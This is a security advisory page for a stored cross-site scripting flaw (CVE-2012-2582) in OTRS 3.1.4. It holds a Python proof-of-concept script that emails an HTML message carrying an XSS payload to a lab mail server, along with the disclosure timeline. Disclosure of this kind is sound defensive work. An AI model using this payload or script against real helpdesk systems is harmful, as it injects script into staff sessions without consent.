OTRS Open Technology Real Services Stored XSS Exploit

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Home
Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

Confidence 2013

5% Off any SANS course
Use Code: SecuriTeam_5

Hack In Paris

La Nuit du Hack

Subjects of Interest:
Vulnerability Management
SQL Injection
Buffer Overflows
Active Network Scanning
Fuzzing
Fuzzer Report
Network Security
Network Scanner
Pen Testing
Security Scanner

OTRS Open Technology Real Services 3.1.4 suffers from stored XSS vulnerability

Credit:
The information has been provided by loneferret.

Free Website Security Scan	Free Fuzzer Report	Vulnerability Assessment
Detect web app vulnerabilities	University study comparing the top	Accurate and automated scanning
Get guidance from professionals.	6 commercially availble fuzzers.	for networks of any size.

Protect your website!
Free Trial, Nothing to install.
No interruption of visitors.
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* OTRS Open Technology Real Services 3.1.4

import smtplib, urllib2

payload = """<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">"""

def sendMail(dstemail, frmemail, smtpsrv, username, password):
msg = "From: hacker@offsec.local\n"
msg += "To: victim@victim.local\n"
msg += 'Date: Today\r\n'
msg += "Subject: XSS\n"
msg += "Content-type: text/html\n\n"
msg += "XSS" + payload + "\r\n\r\n"
server = smtplib.SMTP(smtpsrv)
server.login(username,password)
try:
server.sendmail(frmemail, dstemail, msg)
except Exception, e:
print "[-] Failed to send email:"
print "[*] " + str(e)
server.quit()

username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv = "172.16.84.171"

print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)

CVE Information:
2012-2582

Disclosure Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response other than auto-reply from vendor
08 Aug 2012: Public Disclosure
22 Aug 2012: Update from CERT: vulnerability patched
http://www.kb.cert.org/vuls/id/582879
http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2012-01/

blog comments powered by Disqus

	SimplyPlay v.66 .pls File Buffer Overflow Exploit
	NProtect Anti-Virus Privilege Escalation Vulnerability
	Ripe HD FLV Player Plugin for WordPress Multiple Script Direct Request Path Disclosure Vulnerability
	CMS snews SQL Injection Vulnerability
	WeBid SQL Injection Exploit
	Invision Gallery SQL Injection Exploit
	ArrowChat External.php Lang Parameter Traversal Local File Inclusion Exploit
	WinWebMail Server Stored XSS Exploit
	TFTP Server for Windows ST WRQ Buffer Overflow Exploit
	QNX QCONN Remote Command Execution Exploit
	Distinct TFTP Writable Directory Traversal Execution Exploit
	Xion Audio Player 1.0.127 (.aiff) Denial of Service Exploit
	Wordpress Postie Plugin Stored XSS Exploit
	Vice City Multiplayer Server Remote Code Execution Exploit
	Sphpforum Multiple Exploits
	NetOp Remote Control Client Buffer Overflow Exploit
	MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Exploit
	MaxForum Local File Inclusion Exploit
	Inferno vBShout SQL Injection Vulnerability
	WP Effective Lead Management Persistent XSS Exploit

Featured Articles

	Social Engine Multiple Exploits
	Novell Groupwise Address Book Remote Code Execution Exploit
	GWebmail XSS & LFI RCE Vulnerabilities
	Acpid Privilege Boundary Crossing Exploit
	McAfee Virtual Technician MVT.MVTControl.6300 ActiveX GetObject() Vulnerability
	'SonicWall Global Management System XSS Vulnerability'
	'Opera file:// Overflow'
	'vxFtpSrv CWD Command Overflow'
	'Kaminsky DNS Cache Poisoning Flaw Exploit for Domains'
	'freeSSHD Post Authentication Buffer Overflow (Exploit)'
	'Symantec Altiris Client Service Local Privilege Escalation (Exploit)'
	'Apple Mac OS X SMB Vulnerabilities (mount_smbfs and smbutil)'
	'SurgeMail Webmail Host Header DoS'
	'PHP Win32std Extension safe_mode/disable_functions Protections Bypass'
	'WinPcap NPF.SYS Privilege Elevation Vulnerability (PoC exploit)'
	'MailEnable Buffer Overflow (LOGIN, Exploit)'
	'Durian Web Application Server Buffer Overflow (Exploit)'
	'KsIRC Buffer Overflow Exploit (PRIVMSG)'
	'Allied Telesyn AT-TFTP Server Filename Buffer Overflow (Exploit)'
	'Windows WorkStation NetpManageIPCConnect (MS06-070, Exploit)'

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs